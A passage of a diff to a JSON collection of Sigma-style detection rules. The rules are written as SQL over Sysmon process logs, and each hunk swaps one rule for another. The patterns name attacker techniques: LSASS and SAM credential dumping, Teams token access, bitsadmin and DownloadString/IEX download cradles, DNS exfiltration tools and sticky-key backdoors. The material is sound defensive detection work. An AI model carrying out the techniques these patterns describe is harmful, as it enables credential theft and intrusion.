new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE 